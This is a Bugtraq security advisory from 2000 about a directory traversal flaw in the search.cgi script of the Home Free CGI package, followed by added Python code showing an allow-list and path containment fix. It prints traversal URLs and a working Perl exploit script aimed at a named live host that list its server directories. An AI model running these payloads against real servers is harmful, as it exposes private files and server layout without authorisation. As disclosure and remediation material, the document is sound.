Another search.cgi vulnerability

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Date: Tue, 04 Jan 2000  05:52:23
   From: k0ad k1d <k0adk1d@HOTMAIL.COM>
     To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Another search.cgi vulnerability
--------------------------------------------------------------------------------


==============================================================================

   #!/bin/csh security advisory
   ----------------------------

          Title  :  Vulnerabilities in the SolutionScripts.com
                    Home Free CGI package.

   Advisory Ref  :  csh-adv:04.01.2000-CGI-HomeFree-01

        Credits  :  fzx, omnihil, the guys in !el8
                    DSKZ, M0D

==============================================================================

Introduction
------------

SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that
support the language (WinNT, Linux, various Unix flavors). Home Free is a
package developed and marketed by SolutionScripts.com, below is an extract
from their website.


    "Home Free is the ultimate community building program. Allowing you
     to give your visitors a free web site on your server. With complete
     control over every aspect of your free web site program, you can
     grow page views, revenue and brand awareness for your site."

     http://solutionscripts.com/vault/homefree/index.shtml


Home Free is used by many popular websites. It allows users to set up and
maintain their websites through a series of CGI scripts without posing a
threat to system security.


Details
-------

Home Free consists of the following files from an end-user point of view :-

    ./features.cgi
    ./new.cgi
    ./search.cgi
    ./signup.cgi
    ./user_files.cgi
    ./user_formmail.cgi
    ./user_ftp_import.cgi
    ./user_gbook.cgi
    ./user_manage.cgi
    ./user_pref.cgi
    ./user_uploads.cgi
    ./user_wwwboard.cgi


There are also various 'admin' CGI scripts in the package, such as :-

    ./admin.cgi
    ./admin_browse.cgi
    ./admin_cata.cgi
    ./admin_email.cgi
    ./admin_features.cgi
    ./admin_setup.cgi
    ./admin_update.cgi



Vulnerabilities Identified
--------------------------

    ./search.cgi

    The search.cgi script uses the following input variables :-

      letter=any string
      cata=any string
      perpage=any string
      start=any string
      boolean=or/and
      advanced


    This CGI script can be exploited to view directory listings on the host
    server. A vulnerability exists because of insufficient bounds checking
    of the 'letter' variable when it is parsed by the search.cgi script,
    for example :-


http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt

    The above URL will list the \winnt directory of the host. The search.cgi
    script also seems to read and display the first line of each file
    (network.wri, et al). We have been unable to use the search.cgi script
    or any of the other scripts in the package to view files to date.

    If we had access to the source code of these Perl scripts, I'm sure that
    many security problems would be identified.

    You can also exploit the vulnerability to view other directory listings,
    such as the /cgi-bin directory under Apache.


http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin


    We also took the time in writing a short Perl script to display the
    directory listings of vulnerable servers :

    --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip

    #!/usr/bin/perl
    #
    # Quick exploit of the Home Free ./search.cgi script, allows you to list
    # directories on the host.
    #
    # Default server is antionline's, change as appropriate.
    #

    use IO::Socket;

    # The single argument is the directory name appended to the traversal prefix.
    if ($ARGV[0] eq "") { die "no argument\n"; }

    $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                  PeerAddr  => "members.antionline.com",
                                  PeerPort  => 80) ||
                    die "can't connect to host: $!";

    # Unbuffer the socket so the request is sent immediately.
    select($asoc);
    $| = 1;

    # One HTTP/1.0 request line; the query string must not be wrapped.
    print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";

    # Pull the directory entry name out of each HREF in the returned listing.
    while(<$asoc>) {
            if ($_ =~ /.+HREF.+TD.+/) {
                    @parts = split("\"", $_);
                    $foo = $parts[1];
                    @parts = split("/", $foo);
                    print STDOUT $parts[3];
                    print STDOUT "\n";
            }
    }
    close($asoc);

    --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip



 Other smaller problems were identified when testing the bounds checking and
 flexibility of the other scripts, such as user_manage.cgi. Without access to
 the source code of the Perl scripts in question, it is very difficult to
 know the security implications of such problems. We'll leave that up to
 the vendor to look into and patch.


==============================================================================

   #!/bin/csh security advisory
   ----------------------------

          Title  :  Vulnerabilities in the SolutionScripts.com
                    Home Free CGI package.

   Advisory Ref  :  csh-adv:01.04.2000-CGI-HomeFree-01

        Credits  :  fzx, omnihil, the guys in !el8
                    DSKZ, M0D

==============================================================================

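The advisory shows that search.cgi passes the 'letter' parameter into a filesystem path without adequate checking, and that the payload used backslashes against a Windows host. The following is an added example of how a CGI handler can close that hole; it is not code from the advisory or from SolutionScripts (the Home Free source was not available to the authors), and it assumes a constructed layout in which 'letter' selects a one-character index directory under a user root. It combines an allow-list on the parameter with a containment check that treats both '/' and '\' as separators, so the ..\..\ form is caught as well as ../../.

```python
import posixpath
import re
from typing import Optional, Tuple
from urllib.parse import parse_qs

# Assumed layout (constructed for this example, not taken from Home Free):
# each user's site lives under USER_ROOT and 'letter' names a one-character
# index directory beneath it.
USER_ROOT = "/var/homefree/users"

# Allow-list: exactly one ASCII letter or digit.
SAFE_LETTER = re.compile(r"[A-Za-z0-9]")


def validate_letter(letter: str) -> Optional[str]:
    """Return the lower-cased letter if it passes the allow-list, else None."""
    if SAFE_LETTER.fullmatch(letter):
        return letter.lower()
    return None


def contains_traversal(value: str) -> bool:
    """Detect path-escaping input regardless of the host OS.

    Both '/' and '\\' count as separators: the advisory's payload was
    ..\\..\\..\\..\\winnt, which a check that only looks for '../' misses.
    Absolute paths, drive letters and NUL bytes are rejected as well.
    """
    if "\x00" in value:
        return True
    if value.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", value):
        return True
    return any(part == ".." for part in re.split(r"[\\/]+", value))


def resolve_under_base(base: str, relative: str) -> Optional[str]:
    """Join 'relative' onto 'base' and confirm the result stays inside base.

    Pure string normalisation (posixpath) so it runs offline; on a real
    server also apply os.path.realpath to both sides so symlinks cannot
    escape the root.
    """
    if contains_traversal(relative):
        return None
    base_norm = posixpath.normpath(base)
    candidate = posixpath.normpath(
        posixpath.join(base_norm, relative.replace("\\", "/")))
    if candidate != base_norm and not candidate.startswith(base_norm + "/"):
        return None
    return candidate


def handle_search(query_string: str) -> Tuple[str, Optional[str]]:
    """Parse a search.cgi query string; return ('ok', dir) or ('reject', why)."""
    params = parse_qs(query_string, keep_blank_values=True)
    letter = params.get("letter", [""])[0]
    norm = validate_letter(letter)
    if norm is None:
        return ("reject", "letter must be a single ASCII letter or digit")
    target = resolve_under_base(USER_ROOT, norm)
    if target is None:  # unreachable after the allow-list; kept as defence in depth
        return ("reject", "path escapes user root")
    return ("ok", target)


if __name__ == "__main__":
    # Constructed sample query strings, including the advisory's payload form.
    for qs in ("letter=a&start=1&perpage=all",
               "letter=..\\..\\..\\..\\winnt&start=1&perpage=all",
               "letter=../../../etc&boolean=or"):
        print(qs, "->", handle_search(qs))
```

The allow-list alone is enough to stop the traversal; the containment check in resolve_under_base is the layer that protects code paths which take a less constrained value, and it is the part that must not assume a single separator character.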
